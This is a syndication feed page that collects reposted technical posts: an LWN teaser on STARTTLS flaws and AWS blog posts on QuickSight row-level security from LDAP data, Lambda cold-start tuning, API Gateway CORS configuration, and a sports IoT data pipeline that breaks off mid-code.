[$] STARTTLS considered harmful

Post Syndicated from original https://lwn.net/Articles/866481/rss

The use of Transport
Layer Security
(TLS) encryption is ubiquitous on today’s internet,
though that has largely happened over the last 20 years or so; the first
public version of its predecessor, Secure Sockets Layer (SSL), appeared in
1995. Before then, internet protocols were generally not encrypted, thus providing
fertile ground for various types of “meddler-in-the-middle” (MitM) attacks.
Later on, the
STARTTLS command was added to some protocols as a
backward-compatible way to add TLS support, but the mechanism has suffered from a
number of flaws and vulnerabilities over the years. Some recent research,
going by the name “NO STARTTLS“, describes more, similar
vulnerabilities and concludes that it is probably time to avoid using
STARTTLS altogether.

Implement row-level security using a complete LDAP hierarchical organization structure in Amazon QuickSight

Post Syndicated from Anand Sakhare original https://aws.amazon.com/blogs/big-data/implement-row-level-security-using-a-complete-ldap-hierarchical-organization-structure-in-amazon-quicksight/

In a world where data security is a crucial concern, it’s very important to secure data even within an organization. Amazon QuickSight provides a sophisticated way of implementing data security by applying row-level security so you can restrict data access for visualizations.

An entire organization may need access to the same dashboard, but may also want to restrict access to the data within the dashboard per the organization’s hierarchical structure. For instance, vice presidents need visibility into all data within their organization, team managers need to see the data related to all their direct reports, and an individual contributor just needs to see their own data. Creating and maintaining these data security rules can be laborious if managed manually.

In this post, we go into the details of how to extract the organizational hierarchical structure from Lightweight Directory Access Protocol (LDAP) data, flatten it, and create a row-level security permissions file to mimic the same level of hierarchical access controls to a QuickSight dataset. We show this with mock datasets of the LDAP data and ticketing data, and use that data to implement user-level access on QuickSight visualizations and datasets.

Overview of solution

In this post, we demonstrate processing LDAP data and implementing row-level security to control user-level access according to organizational hierarchies. We demonstrate with a sample dataset how to dynamically change the data behind visualizations. We also talk about automatically creating the permissions file required for implementing security on QuickSight visualizations using the LDAP data. Additionally, we create a sample dashboard and apply the generated permissions file to manage data access for the users.

LDAP hierarchical data (employee dataset)

We use sample LDAP data, which is a mock organizational hierarchical structure. Sample code to generate the hierarchical data is available on the GitHub repo.
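
The repository has the authoritative generator; purely as an illustration of the shape of this data, a minimal (hypothetical) sketch along the following lines produces an employee_id/manager_id table like the one described below, although it doesn’t enforce a fixed number of hierarchy levels:

import csv
import random

def generate_mock_hierarchy(num_employees=250, path="employees.csv"):
    """Generate a mock employee->manager table; employee 0 is the root user."""
    rows = [{"employee_id": 0, "manager_id": ""}]  # the root has no manager
    for emp_id in range(1, num_employees):
        # Any previously created employee can be the manager, which keeps the graph a tree
        rows.append({"employee_id": emp_id, "manager_id": random.randint(0, emp_id - 1)})
    with open(path, "w", newline="") as f:
        writer = csv.DictWriter(f, fieldnames=["employee_id", "manager_id"])
        writer.writeheader()
        writer.writerows(rows)
    return rows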

The basic idea is we have a hierarchical dataset where an employee-manager or employee-supervisor relationship exists. In our sample dataset, we have employee_id and manager_id columns, which represent the employee-manager relationship. The following screenshot is the hierarchical representation of the first few employees in the dataset and the first few rows in the table. The data shows “Mies, Crin” (employee_id 0) is the root user. In our mock data, employee IDs range from 0 to 249, with 10 levels of hierarchy.

The following screenshot shows the hierarchical structure of the sample data.

Ticketing dataset

Our randomly generated sample ticketing dataset has about 250 tickets (see the following screenshot). Each of these tickets is assigned to an employee. The column assigned_to_emp_id represents the employee that the ticket is assigned to. The code to generate a random sample of the data is available on the GitHub repo.

We can replace emp_id with any unique identifier such as UID, RACF ID, email ID, and so on.

Sample organizational structure

The row-level security that we talk about in the next sections ties back to these two datasets. For example, tickets assigned to any employee ID present in the column assigned_to_emp_id should only be visible to the employees that are higher in that employee’s hierarchy. Tickets assigned to employee ID 18 can only be viewed by employee IDs 18, 7, 5, 1, and 0, because employee ID 18 directly or indirectly reports to them. The following screenshot shows an example of the hierarchy.

Preprocess ticketing data by flattening hierarchical relationships

We first need to flatten the LDAP data so that all the employee IDs in an employee’s hierarchy appear in a single row. This flattened data needs to be refreshed to account for any organizational changes, such as new employees onboarding. In this example, we use the SYS_CONNECT_BY_PATH function on an Amazon Relational Database Service (Amazon RDS) database to achieve that. We can achieve the same result programmatically or by using recursive common table expressions (CTEs) in Amazon Redshift. The goal is to create one column per hierarchy level containing the complete path from the highest-level manager down to that employee. Employees who aren’t at the lowest level of the hierarchy have shorter paths, so not every column is populated for every row. A given employee ID appears on their own row, as well as on the rows of every employee they directly or indirectly manage. We query the data with the following code:

SELECT EMPLOYEE_ID, MANAGER_ID, "name", DOB, DEPT, SYS_CONNECT_BY_PATH(EMPLOYEE_ID,'/') "Path", 
regexp_substr(SYS_CONNECT_BY_PATH(EMPLOYEE_ID,'/'), '[^\/]+', 1, 1) "CEO",
regexp_substr(SYS_CONNECT_BY_PATH(EMPLOYEE_ID,'/'), '[^\/]+', 1, 2) "CEO_1",
regexp_substr(SYS_CONNECT_BY_PATH(EMPLOYEE_ID,'/'), '[^\/]+', 1, 3) "CEO_2",
regexp_substr(SYS_CONNECT_BY_PATH(EMPLOYEE_ID,'/'), '[^\/]+', 1, 4) "CEO_3",
regexp_substr(SYS_CONNECT_BY_PATH(EMPLOYEE_ID,'/'), '[^\/]+', 1, 5) "CEO_4",
regexp_substr(SYS_CONNECT_BY_PATH(EMPLOYEE_ID,'/'), '[^\/]+', 1, 6) "CEO_5",
regexp_substr(SYS_CONNECT_BY_PATH(EMPLOYEE_ID,'/'), '[^\/]+', 1, 7) "CEO_6",
regexp_substr(SYS_CONNECT_BY_PATH(EMPLOYEE_ID,'/'), '[^\/]+', 1, 8) "CEO_7",
regexp_substr(SYS_CONNECT_BY_PATH(EMPLOYEE_ID,'/'), '[^\/]+', 1, 9) "CEO_8",
regexp_substr(SYS_CONNECT_BY_PATH(EMPLOYEE_ID,'/'), '[^\/]+', 1, 10) "CEO_9",
regexp_substr(SYS_CONNECT_BY_PATH(EMPLOYEE_ID,'/'), '[^\/]+', 1, 11) "CEO_10"
FROM employees
START WITH MANAGER_ID is NULL
CONNECT BY PRIOR EMPLOYEE_ID = MANAGER_ID
ORDER BY EMPLOYEE_ID;

The following screenshot shows the query output.

The following screenshot shows an example of the hierarchy for employee ID 147.

For employee ID 147, we can see the employees in the hierarchy are organized in columns with their levels. Employee ID 147 reports to 142, 142 reports to 128, and so on. Similarly, for employee ID 142, we can see that the employees above 142 are present in their respective columns.
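
If you take the programmatic route mentioned earlier instead of SYS_CONNECT_BY_PATH or a recursive CTE, the same flattening can be sketched in a few lines of Python. This is a minimal illustration rather than the post’s code; it assumes the employee-manager relationships are already loaded into a dict, and it names the output columns to match the query above:

def flatten_hierarchy(employees, max_levels=11):
    """Walk each employee up to the root and spread the path across the CEO, CEO_1, ... columns.

    `employees` maps employee_id -> manager_id (None for the root user).
    """
    flattened = []
    for emp_id in employees:
        # Build the path from the employee up to the root...
        path = [emp_id]
        manager = employees[emp_id]
        while manager is not None:
            path.append(manager)
            manager = employees[manager]
        path.reverse()  # ...then reorder it root-first, like SYS_CONNECT_BY_PATH
        row = {"EMPLOYEE_ID": emp_id, "MANAGER_ID": employees[emp_id]}
        for level, ancestor in enumerate(path[:max_levels]):
            row["CEO" if level == 0 else "CEO_" + str(level)] = ancestor
        flattened.append(row)
    return flattened

# The example hierarchy from the post: 18 reports to 7, 7 to 5, 5 to 1, and 1 to 0
print(flatten_hierarchy({0: None, 1: 0, 5: 1, 7: 5, 18: 7})[-1])
# {'EMPLOYEE_ID': 18, 'MANAGER_ID': 7, 'CEO': 0, 'CEO_1': 1, 'CEO_2': 5, 'CEO_3': 7, 'CEO_4': 18}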

Join the ticketing data with the flattened LDAP data

To get to the final dataset that we need for visualizations, we need to join the ticketing data with the LDAP data with flattened hierarchies. For our demo, we created two tables, Tickets and Employees, and copied the data we showed earlier to these tables using an Amazon Redshift copy command from Amazon Simple Storage Service (Amazon S3). The following is a sample output of the join query between these tables. This dataset is what we import into SPICE in QuickSight. SPICE is QuickSight’s Super-fast, Parallel, In-memory Calculation Engine, and it’s engineered to rapidly perform advanced calculations and serve data.

select ticket_num,assigned_to_emp_id,name,category,manager_id,ceo,ceo_1,ceo_2,ceo_3,ceo_4,ceo_5,ceo_6,ceo_7,ceo_8,ceo_9,ceo_10  
from blogpostdb.Tickets a JOIN blogpostdb.Employees b
ON a.assigned_to_emp_id = b.EMPLOYEE_ID;

The following screenshot shows our flattened data.

Create the permissions file

You can use the following code snippet to create the permissions file needed to apply row-level security on your dataset in QuickSight:

import csv

def create_permissions_file(list_of_emp_ids, number_of_levels):
    # Header row: UserName plus one column per hierarchy level (ceo, ceo_1, ceo_2, ...)
    output_header = ["ceo_" + str(i) if i != 0 else "ceo" for i in range(number_of_levels)]
    output_header.insert(0, "UserName")
    with open("./sample_permissions_file.csv", "w", newline="") as f:
        writer = csv.writer(f)
        writer.writerow(output_header)
        # One rule row per employee per level column: a row where, say, ceo_3 equals the
        # employee ID grants that user access to dataset rows whose ceo_3 column contains
        # their ID. Taken together, the rows let a user see their entire subtree.
        for emp_id in list_of_emp_ids:
            for level_col in range(1, len(output_header)):
                row = [None] * len(output_header)
                row[0] = emp_id          # UserName
                row[level_col] = emp_id  # restrict on this hierarchy column
                writer.writerow(row)

The input to this function is a list of your employee IDs. These employee IDs appear as owners in the ticketing data as well. There are multiple ways to get the data. If the ticketing data ownership is related to any other user-specific information such as email ID or any unique identifier, then a list of that information is the input to this function. The second input is the number of levels your organization has (integer value). The goal is to create a CSV file to use as a permissions file for your dataset in QuickSight.

Assume there are 10 hierarchical levels in your organization. The output permissions file looks something like the following screenshot.
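
For reference, a call that matches the flattened dataset shown earlier (which carries the path columns ceo through ceo_10) might look like the following; the exact value to pass depends on how many path columns your own dataset contains:

# 250 mock employee IDs, and 11 path columns (ceo through ceo_10) to match the joined dataset
create_permissions_file(list_of_emp_ids=list(range(250)), number_of_levels=11)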

Create QuickSight analyses

We now apply the permission file to the QuickSight dataset. For instructions, see Using Row-Level Security (RLS) to Restrict Access to a Dataset.

Now we create a sample visualization to show the specific tickets owned by an employee or their reportees.

After we import the permissions file and apply it to the final dataset (created by joining the ticketing data with the flattened LDAP data) in SPICE, we create the following visualization. The goal is to verify that when different users log in, they see the same visualization with different data; in this case, only the tickets that concern them.

The following screenshot shows the visualization without any row-level security.

For our hierarchy, we’ve created QuickSight users with usernames that are the same as their employee IDs (the employee with ID 142 has the QuickSight username 142; this can easily be replaced by any unique identifiers your organization uses). We log in with employee IDs 232, 147, 61, 84, and 28, and verify that they only see the tickets that concern them. In the visualization “You are viewing tickets concerning these employees,” we can see whose tickets the logged-in user is authorized to see. Because the mocked data only consists of around 250 tickets randomly assigned to 250 employees, some visualizations may show no data.

The following screenshot shows the example hierarchy. Employee ID 232 is a leaf node (nobody reports to them).

Employee 232 is only authorized to view their own tickets, as shown in the following visualization.

Similarly, because employee ID 147 is also a leaf node, they can only view their assigned tickets.

In our example hierarchy, employee IDs 72, 75, 174, 229, and 134 report to employee 61. In our dataset, only four tickets are assigned to those employees. The following screenshot shows the tickets of concern to employee ID 61.

The following screenshot shows the visualizations visible to employee ID 61.

Similarly, when we log in with employee IDs 84 and 28, we can verify that they only see the tickets concerning them.

Publish the dashboard

You can use the share function to publish the analysis to a dashboard and share the data with stakeholders.

Clean up

To avoid incurring future charges, make sure to remove resources you created when you’re done using them.

Conclusion

Data security is an important concern for many organizations. This solution is an easy way to use organizational LDAP data to implement data security with row-level security in QuickSight. With organizational restructuring, hierarchies are bound to change over time, so the LDAP data can be exported on a periodic basis and the respective Amazon Redshift table updated to match. This gives users better visibility into the data within their organizational hierarchy.


About the Author

Anand Sakhare is a Big Data Architect with AWS. He helps customers build big data, analytics, and machine learning capabilities using a mix of technologies. He is passionate about innovation and solving complex problems.

Rohan Jamadagni is a Sr. Data Architect, working with AWS for the past 5 years. He works closely with customers to implement data and analytics solutions on AWS. He enjoys understanding the meaning behind data and helping customers visualize their data to provide meaningful insights.

Umair Nawaz is a DevOps Engineer at Amazon Web Services in New York City. He works on building secure architectures and advises enterprises on agile software delivery. He is motivated to solve problems strategically by utilizing modern technologies.

Building well-architected serverless applications: Optimizing application performance – part 1

Post Syndicated from Julian Wood original https://aws.amazon.com/blogs/compute/building-well-architected-serverless-applications-optimizing-application-performance-part-1/

This series of blog posts uses the AWS Well-Architected Tool with the Serverless Lens to help customers build and operate applications using best practices. In each post, I address the serverless-specific questions identified by the Serverless Lens along with the recommended best practices. See the introduction post for a table of contents and explanation of the example application.

PERF 1. Optimizing your serverless application’s performance

Evaluate and optimize your serverless application’s performance based on access patterns, scaling mechanisms, and native integrations. This allows you to continuously gain more value per transaction. You can improve your overall experience and make more efficient use of the platform in terms of both value and resources.

Good practice: Measure and optimize function startup time

Evaluate your AWS Lambda function startup time for both performance and cost.

Take advantage of execution environment reuse to improve the performance of your function.

Lambda invokes your function in a secure and isolated runtime environment, and manages the resources required to run your function. When a function is first invoked, the Lambda service creates an instance of the function to process the event. This is called a cold start. After completion, the function remains available for a period of time to process subsequent events. These are called warm starts.

Lambda functions must contain a handler method in your code that processes events. During a cold start, Lambda runs the function initialization code, which is the code outside the handler, and then runs the handler code. During a warm start, Lambda runs the handler code.

Lambda function cold and warm starts

Initialize SDK clients, objects, and database connections outside of the function handler so that they are started during the cold start process. These connections then remain during subsequent warm starts, which improves function performance and cost.

Lambda provides a writable local file system available at /tmp. This is local to each function but shared between subsequent invocations within the same execution environment. You can download and cache assets locally in the /tmp folder during the cold start. This data is then available locally by all subsequent warm start invocations, improving performance.
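
For example, a function can download a reference file to /tmp once per execution environment and reuse it on warm starts. This is a minimal sketch rather than code from the example application; the bucket, key, and environment variable names are hypothetical:

import os

import boto3

s3 = boto3.client("s3")  # created once, during the cold start

CACHE_PATH = "/tmp/reference-data.json"
BUCKET = os.getenv("REFERENCE_BUCKET", "my-example-bucket")  # hypothetical bucket
KEY = "reference-data.json"                                  # hypothetical object key

def lambda_handler(event, context):
    # Only download when the file is not already cached in this execution environment
    if not os.path.exists(CACHE_PATH):
        s3.download_file(BUCKET, KEY, CACHE_PATH)
    with open(CACHE_PATH) as f:
        reference_data = f.read()  # warm starts reuse the cached copy
    return {"bytesCached": len(reference_data)}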

In the serverless airline example used in this series, the confirm booking Lambda function initializes a number of components during the cold start. These include the Lambda Powertools utilities and a boto3 session and table resource for the Amazon DynamoDB table named in the BOOKING_TABLE_NAME environment variable.

import os

import boto3
from aws_lambda_powertools import Logger, Metrics, Tracer
from aws_lambda_powertools.metrics import MetricUnit
from botocore.exceptions import ClientError

# Created once per execution environment, during the cold start
logger = Logger()
tracer = Tracer()
metrics = Metrics()

session = boto3.Session()
dynamodb = session.resource("dynamodb")
table_name = os.getenv("BOOKING_TABLE_NAME", "undefined")
table = dynamodb.Table(table_name)
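
The handler then reuses those module-scoped objects on every invocation. The following is a simplified sketch rather than the actual airline handler, and the event shape and table key are hypothetical:

# Simplified handler sketch (not the airline project's code): the tracer, logger,
# and DynamoDB table created above are reused on every warm invocation.
@tracer.capture_lambda_handler
def lambda_handler(event, context):
    booking_id = event.get("bookingId", "unknown")  # hypothetical event field
    try:
        table.put_item(Item={"id": booking_id, "status": "CONFIRMED"})  # hypothetical key schema
        logger.info({"operation": "confirm_booking", "booking_id": booking_id})
        return {"bookingId": booking_id, "status": "CONFIRMED"}
    except ClientError:
        logger.exception("Unable to confirm booking")
        raise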

Analyze and improve startup time

There are a number of steps you can take to measure and optimize Lambda function initialization time.

You can view the function cold start initialization time using Amazon CloudWatch Logs and AWS X-Ray. A log REPORT line for a cold start includes the Init Duration value. This is the time the initialization code takes to run before the handler.

CloudWatch Logs cold start report line

When X-Ray tracing is enabled for a function, the trace includes the Initialization segment.

X-Ray trace cold start showing initialization segment

A subsequent warm start REPORT line does not include the Init Duration value, and is not present in the X-Ray trace:

CloudWatch Logs warm start report line

X-Ray trace warm start without showing initialization segment

CloudWatch Logs Insights allows you to search and analyze CloudWatch Logs data over multiple log groups. There are some useful searches to understand cold starts.

Understand cold start percentage over time:

filter @type = "REPORT"
| stats
  sum(strcontains(
    @message,
    "Init Duration"))
  / count(*)
  * 100
  as coldStartPercentage,
  avg(@duration)
  by bin(5m)
Cold start percentage over time

Cold start count and InitDuration:

filter @type="REPORT" 
| fields @memorySize / 1000000 as memorySize
| filter @message like /(?i)(Init Duration)/
| parse @message /^REPORT.*Init Duration: (?<initDuration>.*) ms.*/
| parse @log /^.*\/aws\/lambda\/(?<functionName>.*)/
| stats count() as coldStarts, median(initDuration) as avgInitDuration, max(initDuration) as maxInitDuration by functionName, memorySize
Cold start count and InitDuration

Once you have measured cold start performance, there are a number of ways to optimize startup time. For Python, you can use the PYTHONPROFILEIMPORTTIME=1 environment variable.

PYTHONPROFILEIMPORTTIME environment variable

This shows how long each package import takes to help you understand how packages impact startup time.

Python import time

Previously, for the AWS Node.js SDK, you enabled HTTP keep-alive in your code to maintain TCP connections. Enabling keep-alive allows you to avoid setting up a new TCP connection for every request. Since AWS SDK version 2.463.0, you can also set the Lambda function environment variable AWS_NODEJS_CONNECTION_REUSE_ENABLED=1 to make the SDK reuse connections by default.

You can configure Lambda’s provisioned concurrency feature to pre-initialize a requested number of execution environments. This runs the cold start initialization code so that they are prepared to respond immediately to your function’s invocations.

Use Amazon RDS Proxy to pool and share database connections to improve function performance. For additional options for using RDS with Lambda, see the AWS Serverless Hero blog post “How To: Manage RDS Connections from AWS Lambda Serverless Functions”.

Choose frameworks that load quickly during function initialization. For example, prefer simpler Java dependency injection frameworks like Dagger or Guice over more complex frameworks such as Spring. When using the AWS SDK for Java, there are some cold start performance optimization suggestions in the documentation. For further Java performance optimization tips, see the AWS re:Invent session, “Best practices for AWS Lambda and Java”.

To minimize deployment packages, choose lightweight web frameworks optimized for Lambda. For example, use MiddyJS, Lambda API JS, and Python Chalice over Node.js Express, Python Django or Flask.

If your function has many objects and connections, consider splitting the function into multiple, specialized functions. These are individually smaller and have less initialization code. I cover designing smaller, single purpose functions from a security perspective in “Managing application security boundaries – part 2”.

Minimize your deployment package size to only its runtime necessities

Smaller functions also allow you to separate functionality. Only import the libraries and dependencies that are necessary for your application processing. Use code bundling when you can to reduce the impact of file system lookup calls; bundling also reduces the deployment package size.

For example, if you only use Amazon DynamoDB in the AWS SDK, instead of importing the entire SDK, you can import an individual service. Compare the following three examples as shown in the Lambda Operator Guide:

// Instead of const AWS = require('aws-sdk'), use:
const DynamoDB = require('aws-sdk/clients/dynamodb')

// Instead of const AWSXRay = require('aws-xray-sdk'), use:
const AWSXRay = require('aws-xray-sdk-core')

// Instead of const AWS = AWSXRay.captureAWS(require('aws-sdk')), use:
const dynamodb = new DynamoDB.DocumentClient()
AWSXRay.captureAWSClient(dynamodb.service)

In testing, importing the DynamoDB library instead of the entire AWS SDK was 125 ms faster. Importing the X-Ray core library was 5 ms faster than the X-Ray SDK. Similarly, when wrapping a service initialization, preparing a DocumentClient before wrapping showed a 140-ms gain. Version 3 of the AWS SDK for JavaScript supports modular imports, which can further help reduce unused dependencies.

For additional options for optimizing AWS Node.js SDK imports, see the AWS Serverless Hero blog post.

Conclusion

Evaluate and optimize your serverless application’s performance based on access patterns, scaling mechanisms, and native integrations. You can improve your overall experience and make more efficient use of the platform in terms of both value and resources.

In this post, I cover measuring and optimizing function startup time. I explain cold and warm starts and how to reuse the Lambda execution environment to improve performance. I show a number of ways to analyze and optimize the initialization startup time. I explain how only importing necessary libraries and dependencies increases application performance.

This well-architected question continues in part 2, where I look at designing your function to take advantage of concurrency via asynchronous and stream-based invocations. I cover measuring, evaluating, and selecting optimal capacity units.

For more serverless learning resources, visit Serverless Land.

Configuring CORS on Amazon API Gateway APIs

Post Syndicated from Eric Johnson original https://aws.amazon.com/blogs/compute/configuring-cors-on-amazon-api-gateway-apis/

Configuring cross-origin resource sharing (CORS) settings for a backend server is a typical challenge that developers face when building web applications. CORS is a layer of security enforced by modern browsers and is required when the client domain does not match the server domain. The complexity of CORS often leads developers to abandon it entirely by allowing all-access with the proverbial “*” permissions setting. However, CORS is an essential part of your application’s security posture and should be correctly configured.

This post explains how to configure CORS on Amazon API Gateway resources to enforce the least privileged access to an endpoint using the AWS Serverless Application Model (AWS SAM). I cover the notable CORS differences between REST APIs and HTTP APIs. Finally, I introduce you to the Amazon API Gateway CORS Configurator. This is a tool built by the AWS Serverless Developer Advocacy team to help you configure CORS settings properly.

Overview

CORS is a mechanism by which a server limits access through the use of headers. In requests that are not considered simple, the server relies on the browser to make a CORS preflight or OPTIONS request. A full request looks like this:

CORS request flow

  1. Client application initiates a request
  2. Browser sends a preflight request
  3. Server sends a preflight response
  4. Browser sends the actual request
  5. Server sends the actual response
  6. Client receives the actual response

The preflight request verifies the requirements of the server by indicating the origin, method, and headers to come in the actual request.

OPTIONS preflight request

The response from the server differs based on the backend you are using. Some servers respond with the allowed origin, methods, and headers for the endpoint.

OPTIONS preflight response

Others only return CORS headers if the requested origin, method, and headers meet the requirements of the server. If the requirements are not met, then the response does not contain any CORS access control headers. The browser verifies the request’s origin, method, and headers against the data returned in the preflight response. If validation fails, the browser throws a CORS error and halts the request. If the validation is successful, the browser continues with the actual request.

Actual request

During the actual request, the browser sends the origin header, and the server only needs to return the access-control-allow-origin header so the browser can verify the requesting origin. The server then responds with the requested data.

Actual response

This step is where many developers run into issues. Notice the endpoint of the actual request returns the access-control-allow-origin header. The browser once again verifies this before taking action.

Both the preflight and the actual response require CORS configuration, and it looks different depending on whether you select REST API or HTTP API.

Configuring API Gateway for CORS

While Amazon API Gateway offers several API endpoint types, this post focuses on REST API (v1) and HTTP API (v2). Both types create a representational state transfer (REST) endpoint that proxies an AWS Lambda function and other AWS services or third-party endpoints. Both types process preflight requests. However, there are differences in both the configuration, and the format of the integration response.

Terminology

Before walking through the configuration examples, it is important to understand some terminology:

  • Resource: A unique identifier for the API path (/customer/reports/{region}). Resources can have subresources that combine to make a unique path.
  • Method: the REST methods (for example, GET, POST, PUT, PATCH) the resource supports. The method is not part of the path but is passed through the headers.
  • Endpoint: A combination of resources and methods to create a unique API URL.

REST APIs

A popular use of API Gateway REST APIs is to proxy one or more Lambda functions to build a serverless backend. In this pattern, API Gateway does not modify the request or response payload. Therefore, REST API manages CORS through a combination of preflight configuration and a properly formed response from the Lambda function.

Preflight requests

CORS on REST APIs is generally configured in four lines of code with AWS SAM:

Cors:
  AllowMethods: "'GET, POST, OPTIONS'"
  AllowOrigin: "'http://localhost:3000'"
  AllowHeaders: "'Content-type, x-api-key'"

This code snippet creates a MOCK API resource that processes all preflight requests for that resource. This configuration is an example of the least privileged access to the server. It only allows GET, POST, and OPTIONS methods from a localhost endpoint on port 3000. Additionally, it only allows the Content-type and x-api-key CORS headers.

Notice that the preflight response only allows one origin to call this API. To enable multiple origins with REST APIs, use ‘*’ for the access-control-allow-origin header. Alternatively, use a Lambda function integration instead of a MOCK integration to set the header dynamically based on the origin of the caller.
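
A minimal Python sketch of that dynamic approach, using a Lambda proxy integration and a hypothetical origin allowlist, could look like this:

import json

# Hypothetical allowlist; replace with the origins your application actually serves
ALLOWED_ORIGINS = {"http://localhost:3000", "https://myproddomain.com"}

def lambda_handler(event, context):
    request_headers = event.get("headers") or {}
    origin = request_headers.get("origin") or request_headers.get("Origin") or ""
    headers = {"content-type": "application/json"}
    # Only reflect the origin back when it is explicitly allowed
    if origin in ALLOWED_ORIGINS:
        headers["access-control-allow-origin"] = origin
        headers["access-control-allow-methods"] = "GET, POST, OPTIONS"
        headers["access-control-allow-headers"] = "Content-type, x-api-key"
    return {
        "statusCode": 200,
        "headers": headers,
        "body": json.dumps({"message": "hello world"}),
    }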

Authorization

When configuring CORS for REST APIs that require authentication, it is important to configure the preflight endpoint without authorization required. The preflight is generated by the browser and does not include the credentials by default. To remove the authorizer from the OPTIONS method, add the AddDefaultAuthorizerToCorsPreflight: false setting to the authorization configuration.

Auth:
  AddDefaultAuthorizerToCorsPreflight: false
  Authorizers:
    MyCognitoAuth:
  
  …

Response

In REST APIs proxy configurations, CORS settings only apply to the OPTIONS endpoint and cover only the preflight check by the browser. The Lambda function backing the method must respond with the appropriate CORS information to handle CORS properly in the actual response. The following is an example of a proper response:

{
  "statusCode": 200,
  "headers": {
    "access-control-allow-origin": "http://localhost:3000"
  },
  "body": "{\"message\": \"hello world\"}"
}

In this response, the critical parts are the statusCode returned to the user as the response status and the access-control-allow-origin header required by the browser’s CORS validation.

HTTP APIs

Like REST APIs, Amazon API Gateway HTTP APIs are commonly used to proxy Lambda functions and are configured to handle preflight requests. However, unlike REST APIs, HTTP APIs handle CORS for the actual API response as well.

Preflight requests

The following example shows how to configure CORS on HTTP APIs with AWS SAM:

CorsConfiguration:
  AllowMethods:
    - GET
    - POST
    - OPTIONS
  AllowOrigins:
    - http://localhost:3000
    - https://myproddomain.com
  AllowHeaders:
    - Content-type
    - x-api-key

This template configures HTTP APIs to manage CORS for the preflight requests and the actual requests. Note that the AllowOrigins section allows more than one domain. When the browser makes a request, HTTP APIs checks the list for the incoming origin. If it exists, HTTP APIs adds it to the access-control-allow-origin header in the response.

Authorization

When configuring CORS for HTTP APIs with authorization configured, HTTP APIs automatically configures the preflight endpoint without authorization required. The only caveat to this is the use of the $default route. When configuring a $default route, all methods and resources are handled by the default route and the integration behind it. This includes the preflight OPTIONS method.

There are two options to handle preflight. The first, and recommended, option is to break out the routes individually: create a route specifically for each method and resource as needed. The second is to create an OPTIONS /{proxy+} method to override the $default route for preflight requests.

Response

Unlike REST APIs, by default, HTTP APIs modify the response for the actual request by adding the appropriate CORS headers based upon the CORS configuration. The following is an example of a simple response:

"hello world"

HTTP APIs then constructs the complete response with your data, status code, and any required CORS headers:

{
  "statusCode": 200,
  "headers": {
    "access-control-allow-origin": "[appropriate origin]"
  },
  "body": "hello world"
}

To set the status code manually, configure your response as follows:

{
  "statusCode": 201,
  "body": "hello world"
}

To manage the complete response like in REST APIs, set the payload format to version one. The payload format for HTTP API changes the structure of the payload sent to the Lambda function and the expected response from the Lambda function. By default, HTTP API uses version two, which includes the dynamic CORS settings. For more information, read how the payload version affects the response format in the documentation.

The Amazon API Gateway CORS Configurator

The AWS serverless developer advocacy team built the Amazon API Gateway CORS Configurator to help you configure CORS for your serverless applications.

Amazon API Gateway CORS Configurator

Start by entering the information on the left. The CORS Configurator builds the proper snippets to add the CORS settings to your AWS SAM template as you add more information. The utility demonstrates adding the configuration to all APIs in the template by using the Globals section. You can also add the configuration to a specific API resource to affect only that API.

Additionally, the CORS Configurator constructs an example response based on the API type you are using.

This utility is currently in preview, and we welcome your feedback on how we can improve it. Feel free to open an issue on GitHub at https://github.com/aws-samples/amazon-api-gateway-cors-configurator.

Conclusion

CORS can be challenging. For API Gateway, CORS configuration is the number one question developers ask. In this post, I give an overview of CORS with a link to an in-depth explanation. I then show how to configure API Gateway to create the least privileged access to your server using CORS. I also discuss the differences in how REST APIs and HTTP APIs handle CORS. Finally, I introduce the API Gateway CORS Configurator to help you configure CORS using AWS SAM.

I hope to provide you with enough information that you can avoid opening up your servers with the “*” setting for CORS. Take the time to understand your application and limit requests to only the methods you support and only the originating hosts you intend.

For more serverless content, go to Serverless Land.

Building a Data Pipeline for Tracking Sporting Events Using AWS Services

Post Syndicated from Ashwini Rudra original https://aws.amazon.com/blogs/architecture/building-a-data-pipeline-for-tracking-sporting-events-using-aws-services/

In an evolving world that is increasingly connected, data-centric, and fast-paced, the sports industry is no exception. Amazon Web Services (AWS) has been helping customers in the sports industry gain real-time insights through analytics. You can re-invent and reimagine the fan experience by tracking sports actions and activities. In this blog post, we will highlight common architectural and design patterns for building a data pipeline to track sporting events in real time.

The sports industry is largely composed of two subsegments: participatory and spectator sports. Participatory sports, for example fitness, golf, boating, and skiing, comprise the largest share of the market. Spectator sports, such as teams/clubs/leagues, individual sports, and racing, are expected to be the fastest growing segment. Sports teams/leagues/clubs comprise the largest share of the spectator sports segment and are growing most rapidly.

IoT data pipeline architecture overview

Let’s discuss the infrastructure in three parts:

  1. Infrastructure at the arena itself
  2. Processing data using AWS services
  3. Leveraging this analysis using a graphics overlay (this can be especially useful for broadcasters, OTT channels, and arena users)

Data-gathering devices

Radio-frequency identification (RFID) chips or IoT devices can be worn by players or embedded in the playing equipment. These devices emit 20–50 messages per second, which are collected and output as JSON. This information may include player coordinate positions, player speed, statistics, health information, and more. Leagues, coaches, or broadcasters can then analyze this data using analytics tools and/or machine learning.

Figure 1. Data pipeline architecture using AWS Services

Processing data, feature engineering, and model training at AWS

Use serverless services from AWS when possible in order to keep your solution scalable and cost-efficient. This also helps with operational overhead for teams. You can use the Kinesis family of services for stream ingestion and processing. The streaming data from hundreds to thousands of IoT sources (from equipment and clothing) can be fed to Amazon Kinesis Data Streams (KDS). KDS and Amazon Kinesis Data Firehose provide a buffering mechanism for streaming data before it lands on Amazon Simple Storage Service (S3). With Amazon Kinesis Data Analytics, you can process and analyze Kinesis stream data using powerful SQL, Apache Flink, or Beam. Kinesis Data Analytics also supports building applications in SQL, Java, Scala, and Python. With this service, you can quickly author and run powerful SQL code against Amazon Kinesis Streams as your source. This way you can perform time series analytics, feed real-time dashboards, and create real-time metrics. Read more about Amazon Kinesis Data Analytics for SQL Applications.

You might want to transform or enhance the streaming data before it is delivered to Amazon S3. Amazon Kinesis Data Firehose can be used with an AWS Lambda function to do the transformation. Let’s say you have a player prediction timestamp that you want to represent in a different time format to different ML algorithms. Lambda can process and transform this data. Kinesis Data Firehose will deliver the transformed and raw data to the destination (Amazon S3). This can occur after the specific buffering size or when the buffering interval is reached, whichever happens first.
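
As a rough illustration of that transformation step, a Kinesis Data Firehose transformation Lambda function receives base64-encoded records and returns them transformed. The sketch below is hypothetical; in particular, the prediction_ts field name is made up:

import base64
import json
from datetime import datetime, timezone

def lambda_handler(event, context):
    output = []
    for record in event["records"]:
        payload = json.loads(base64.b64decode(record["data"]))
        # Hypothetical field: convert an epoch timestamp into ISO 8601 for downstream ML tooling
        if "prediction_ts" in payload:
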